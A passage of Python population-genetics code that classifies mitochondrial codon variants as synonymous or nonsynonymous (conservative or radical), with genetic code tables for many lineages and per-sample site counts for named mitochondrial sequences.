currMin = currAlleleList[0]
mutType = CRI(currAAList)
sys.stdout.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currAlleleList) + '\t' + str(currAAList) + '\tN\t' + str(mutType[0]) + '\t' + str(mutType[1]) + '\t' + str(mutType[2]) + '\t' + str(mutType[3]) + '\t' + str(mutType[4]) + '\t' + str(mutType[5]) + '\t' + str(mutType[6]) + '\t' + str(mutType[7]) + '\t' + str(currAlleleDict[currMin]) + '\n')
else:
currMax = currCodonDict[currCodonList[0]]
maxCodon = currCodonList[0]
currMin = currCodonDict[currCodonList[0]]
minCodon = currCodonList[0]
for codon in currCodonList[1:]:
if currCodonDict[codon] >= currMax:
currMax = currCodonDict[codon]
maxCodon = codon
elif currCodonDict[codon] <= currMin:
currMin = currCodonDict[codon]
minCodon = codon
newAAList = []
if codonNum == 0:
if maxCodon in startCodons:
newAAList.append('M')
else:
newAAList.append(geneticCode[maxCodon])
if minCodon not in startCodons:
newAAList.append(geneticCode[minCodon])
else:
newAAList.append(geneticCode[maxCodon])
if geneticCode[minCodon] not in newAAList:
newAAList.append(geneticCode[minCodon])
if len(newAAList) == 2:
mutType = CRI(newAAList)
sys.stdout.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currAlleleList) + '\t' + str(newAAList) + '\tN\t' + str(mutType[0]) + '\t' + str(mutType[1]) + '\t' + str(mutType[2]) + '\t' + str(mutType[3]) + '\t' + str(mutType[4]) + '\t' + str(mutType[5]) + '\t' + str(mutType[6]) + '\t' + str(mutType[7]) + '\t' + str(currCodonDict[minCodon]) + '\n')
else:
sys.stdout.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currAlleleList) + '\t' + newAAList[0] + '\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(currCodonDict[minCodon]) + '\n')
elif len(currAlleleList) > 2:
currCodonDict = {}
currCodonList = []
for seq in asexList:
currCodons = codonDict[seq]
currCodon = currCodons[codonNum]
if 'N' not in currCodon and '-' not in currCodon and currCodon not in currCodonList:
currCodonList.append(currCodon)
currCodonDict[currCodon] = 1
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currCodonDict[currCodon] + 1
currCodonDict[currCodon] = currValue
currAAList = []
for codon in currCodonList:
if codonNum == 0:
if codon in startCodons:
if 'M' not in currAAList:
currAAList.append('M')
else:
if geneticCode[codon] not in currAAList:
currAAList.append(geneticCode[codon])
elif geneticCode[codon] not in currAAList:
currAAList.append(geneticCode[codon])
logfile.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currCodonDict) + '\t' + str(currAAList) + '\n')
logfile.close()
def numSingletons(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
synSites = {">$Duluth":2591.52083333, ">$Heron2":2598, ">$McGregor":2599, ">$Waik36":2586.91666667, ">$WalesC":2584.91666667, ">$clone_1":2598, ">$AC51":2598.33333333, ">$Heron_mitochondrion":2599, ">$clone_7":2592.85416667, ">$Waik37":2586.58333333, ">$Gunn":2597.66666667, ">$DenmarkA":2593.125, ">$Waik372":2589.25, ">$Tarawera":2586.58333333, ">$Poerua_triploid":2597, ">$Kaniere_triploid":2586.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2593.79166667, ">$Brunner_2_4n":2593.60416674, ">$Brunner_6_3n":2592.9583334, ">$Grasmere_1_4n":2628.66666703, ">$Grasmere_6_3n":2599.62500001, ">$Poerua_72_4n":2605.47916675, ">$Rotoiti_1_4n":2594.35416672, ">$*Kaniere_1_2n":2598.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2595, ">$*Yellow_Contig_56":2592.33333333, ">$*Alexsex":2592.33333333, ">$*AlexMap":2592.33333333, ">$*Lady":2598.66666667, ">$*Ianthe":2597, ">$*Rotoroa_1_2n":2598.58333338}
C1Sites = {">$Duluth":6323.85416667, ">$Heron2":6320.33333333, ">$McGregor":6319, ">$Waik36":6330.25, ">$WalesC":6333.25, ">$clone_1":6319.66666667, ">$AC51":6318.66666667, ">$Heron_mitochondrion":6319.33333333, ">$clone_7":6322.52083333, ">$Waik37":6327.25, ">$Gunn":6324.33333333, ">$DenmarkA":6322.45833333, ">$Waik372":6330.58333333, ">$Tarawera":6329.25, ">$Poerua_triploid":6321.66666667, ">$Kaniere_triploid":6330.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":6320.125, ">$Brunner_2_4n":6259.27083326, ">$Brunner_6_3n":6262.95833327, ">$Grasmere_1_4n":5990.99999963, ">$Grasmere_6_3n":6307.62499999, ">$Poerua_72_4n":6232.81249992, ">$Rotoiti_1_4n":6264.68749995, ">$*Kaniere_1_2n":6320.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":6321, ">$*Yellow_Contig_56":6326.33333333, ">$*Alexsex":6326.33333333, ">$*AlexMap":6326.33333333, ">$*Lady":6318, ">$*Ianthe":6321.33333333, ">$*Rotoroa_1_2n":6271.58333329}
R1Sites = {">$Duluth":2298.625, ">$Heron2":2295.66666667, ">$McGregor":2296, ">$Waik36":2296.83333333, ">$WalesC":2295.83333333, ">$clone_1":2296.33333333, ">$AC51":2297, ">$Heron_mitochondrion":2295.66666667, ">$clone_7":2298.625, ">$Waik37":2300.16666667, ">$Gunn":2292, ">$DenmarkA":2298.41666667, ">$Waik372":2294.16666667, ">$Tarawera":2298.16666667, ">$Poerua_triploid":2295.33333333, ">$Kaniere_triploid":2296.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2300.08333333, ">$Brunner_2_4n":2361.125, ">$Brunner_6_3n":2358.08333333, ">$Grasmere_1_4n":2594.33333333, ">$Grasmere_6_3n":2306.75, ">$Poerua_72_4n":2375.70833333, ">$Rotoiti_1_4n":2354.95833333, ">$*Kaniere_1_2n":2295.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2298, ">$*Yellow_Contig_56":2295.33333333, ">$*Alexsex":2295.33333333, ">$*AlexMap":2295.33333333, ">$*Lady":2297.33333333, ">$*Ianthe":2295.66666667, ">$*Rotoroa_1_2n":2343.83333333}
C2Sites = {">$Duluth":5093.47916667, ">$Heron2":5090.33333333, ">$McGregor":5089.66666667, ">$Waik36":5100.75, ">$WalesC":5101.75, ">$clone_1":5091.33333333, ">$AC51":5089.33333333, ">$Heron_mitochondrion":5088.66666667, ">$clone_7":5092.14583333, ">$Waik37":5096.75, ">$Gunn":5090.33333333, ">$DenmarkA":5091.875, ">$Waik372":5097.41666667, ">$Tarawera":5097.08333333, ">$Poerua_triploid":5092, ">$Kaniere_triploid":5096.75, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5091.20833333, ">$Brunner_2_4n":5082.39583326, ">$Brunner_6_3n":5076.37499994, ">$Grasmere_1_4n":4999.33333297, ">$Grasmere_6_3n":5084.70833332, ">$Poerua_72_4n":5059.52083325, ">$Rotoiti_1_4n":5085.97916662, ">$*Kaniere_1_2n":5090, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5095.33333333, ">$*Yellow_Contig_56":5097.33333333, ">$*Alexsex":5097.33333333, ">$*AlexMap":5097.33333333, ">$*Lady":5089, ">$*Ianthe":5093, ">$*Rotoroa_1_2n":5078.41666662}
R2Sites = {">$Duluth":3529, ">$Heron2":3525.66666667, ">$McGregor":3525.33333333, ">$Waik36":3526.33333333, ">$WalesC":3527.33333333, ">$clone_1":3524.66666667, ">$AC51":3526.33333333, ">$Heron_mitochondrion":3526.33333333, ">$clone_7":3529, ">$Waik37":3530.66666667, ">$Gunn":3526, ">$DenmarkA":3529, ">$Waik372":3527.33333333, ">$Tarawera":3530.33333333, ">$Poerua_triploid":3525, ">$Kaniere_triploid":3530.66666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3529, ">$Brunner_2_4n":3538, ">$Brunner_6_3n":3544.66666667, ">$Grasmere_1_4n":3586, ">$Grasmere_6_3n":3529.66666667, ">$Poerua_72_4n":3549, ">$Rotoiti_1_4n":3533.66666667, ">$*Kaniere_1_2n":3525.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3523.66666667, ">$*Yellow_Contig_56":3524.33333333, ">$*Alexsex":3524.33333333, ">$*AlexMap":3524.33333333, ">$*Lady":3526.33333333, ">$*Ianthe":3524, ">$*Rotoroa_1_2n":3537}
C3Sites = {">$Duluth":2949.125, ">$Heron2":2945, ">$McGregor":2945, ">$Waik36":2947.16666667, ">$WalesC":2950.83333333, ">$clone_1":2944.66666667, ">$AC51":2945, ">$Heron_mitochondrion":2944.66666667, ">$clone_7":2949.79166667, ">$Waik37":2950.5, ">$Gunn":2944, ">$DenmarkA":2949.75, ">$Waik372":2952.83333333, ">$Tarawera":2950.5, ">$Poerua_triploid":2945.66666667, ">$Kaniere_triploid":2950.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2948.75, ">$Brunner_2_4n":2917.29166659, ">$Brunner_6_3n":2925.4166666, ">$Grasmere_1_4n":2832.33333297, ">$Grasmere_6_3n":2941.74999999, ">$Poerua_72_4n":2926.20833325, ">$Rotoiti_1_4n":2932.12499995, ">$*Kaniere_1_2n":2945.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2945.33333333, ">$*Yellow_Contig_56":2946.66666667, ">$*Alexsex":2946.66666667, ">$*AlexMap":2946.66666667, ">$*Lady":2947.33333333, ">$*Ianthe":2945.33333333, ">$*Rotoroa_1_2n":2928.16666662}
